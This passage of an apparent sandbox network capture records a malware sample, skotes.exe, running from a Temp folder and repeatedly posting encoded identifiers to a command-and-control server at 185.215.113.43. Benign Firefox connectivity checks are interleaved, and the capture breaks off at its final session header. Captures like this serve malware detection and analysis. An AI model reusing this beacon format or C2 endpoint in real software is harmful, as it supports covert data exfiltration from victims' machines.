Dec 16, 2024 11:05:30.729952097 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Sun, 15 Dec 2024 11:58:44 GMT Age: 79606 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.5	50206	185.215.113.43	80	5492	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:05:29.941045046 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 16, 2024 11:05:31.279239893 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:05:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
65	192.168.2.5	50207	34.107.221.82	80

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:05:30.845988035 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 16, 2024 11:05:31.930975914 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Sun, 15 Dec 2024 11:58:44 GMT Age: 79607 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 16, 2024 11:05:33.700032949 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 16, 2024 11:05:34.014034986 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Sun, 15 Dec 2024 11:58:44 GMT Age: 79609 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 16, 2024 11:05:44.074379921 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 16, 2024 11:05:45.102226019 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 16, 2024 11:05:45.416172028 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Sun, 15 Dec 2024 11:58:44 GMT Age: 79621 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 16, 2024 11:05:55.480528116 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 16, 2024 11:05:55.728683949 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 16, 2024 11:05:56.043797016 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Sun, 15 Dec 2024 11:58:44 GMT Age: 79631 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 16, 2024 11:05:56.075783968 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 16, 2024 11:05:56.390007973 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Sun, 15 Dec 2024 11:58:44 GMT Age: 79632 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 16, 2024 11:05:57.159008980 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 16, 2024 11:05:57.478589058 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Sun, 15 Dec 2024 11:58:44 GMT Age: 79633 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 16, 2024 11:06:00.676152945 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 16, 2024 11:06:00.989949942 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Sun, 15 Dec 2024 11:58:44 GMT Age: 79636 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 16, 2024 11:06:06.489717007 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 16, 2024 11:06:06.804678917 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Sun, 15 Dec 2024 11:58:44 GMT Age: 79642 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 16, 2024 11:06:16.864387989 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 16, 2024 11:06:25.866309881 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 16, 2024 11:06:26.180249929 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Sun, 15 Dec 2024 11:58:44 GMT Age: 79662 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 16, 2024 11:06:36.267028093 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 16, 2024 11:06:46.468132973 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 16, 2024 11:06:47.971992970 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 16, 2024 11:06:48.285964012 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Sun, 15 Dec 2024 11:58:44 GMT Age: 79684 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 16, 2024 11:06:58.372193098 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 16, 2024 11:07:08.564578056 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 16, 2024 11:07:18.778114080 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 16, 2024 11:07:28.972197056 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 16, 2024 11:07:39.165713072 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 16, 2024 11:08:09.773891926 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 16, 2024 11:08:10.087724924 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Sun, 15 Dec 2024 11:58:44 GMT Age: 79765 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 16, 2024 11:08:27.618196011 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 16, 2024 11:08:27.932323933 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Sun, 15 Dec 2024 11:58:44 GMT Age: 79783 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.5	50210	185.215.113.43	80	5492	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:05:32.947273016 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 41 32 43 37 39 42 35 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EBA2C79B55D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Dec 16, 2024 11:05:34.284614086 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:05:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.5	50213	185.215.113.43	80	5492	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:05:36.027183056 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 16, 2024 11:05:37.358661890 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:05:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.5	50214	185.215.113.43	80	5492	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:05:38.987565041 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 41 32 43 37 39 42 35 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EBA2C79B55D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Dec 16, 2024 11:05:40.334578037 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:05:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.5	50215	185.215.113.43	80	5492	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:05:42.087075949 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 16, 2024 11:05:43.417567968 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:05:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.2.5	50218	185.215.113.43	80	5492	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:05:45.053839922 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 41 32 43 37 39 42 35 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EBA2C79B55D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Dec 16, 2024 11:05:46.396454096 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:05:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
71	192.168.2.5	50220	185.215.113.43	80	5492	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:05:48.136714935 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 16, 2024 11:05:49.485110998 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:05:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
72	192.168.2.5	50222	185.215.113.43	80	5492	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:05:51.117315054 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 41 32 43 37 39 42 35 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EBA2C79B55D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Dec 16, 2024 11:05:52.454920053 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:05:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
73	192.168.2.5	50225	185.215.113.43	80	5492	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:05:54.195859909 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 16, 2024 11:05:55.544956923 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:05:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
74	192.168.2.5	50238	185.215.113.43	80	5492	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:05:57.173660994 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 41 32 43 37 39 42 35 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EBA2C79B55D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Dec 16, 2024 11:05:58.522099018 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:05:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
75	192.168.2.5	50242	185.215.113.43	80	5492	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:06:00.275322914 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 16, 2024 11:06:01.606089115 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:06:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
76	192.168.2.5	50244	185.215.113.43	80	5492	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:06:03.253350019 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 41 32 43 37 39 42 35 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EBA2C79B55D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Dec 16, 2024 11:06:04.607144117 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:06:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
77	192.168.2.5	50246	185.215.113.43	80	5492	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:06:06.354423046 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 16, 2024 11:06:07.686476946 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:06:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
78	192.168.2.5	50247	185.215.113.43	80	5492	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:06:09.329166889 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 41 32 43 37 39 42 35 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EBA2C79B55D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Dec 16, 2024 11:06:10.668888092 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:06:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
79	192.168.2.5	50248	185.215.113.43	80	5492	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:06:12.405329943 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 16, 2024 11:06:13.737922907 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:06:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
80	192.168.2.5	50249	185.215.113.43	80	5492	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
